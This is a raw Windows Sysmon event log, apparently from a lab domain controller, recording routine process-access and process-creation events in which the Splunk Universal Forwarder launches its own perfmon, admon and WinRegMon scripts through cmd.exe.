12:02:58.622{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.623{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.514{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.405{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 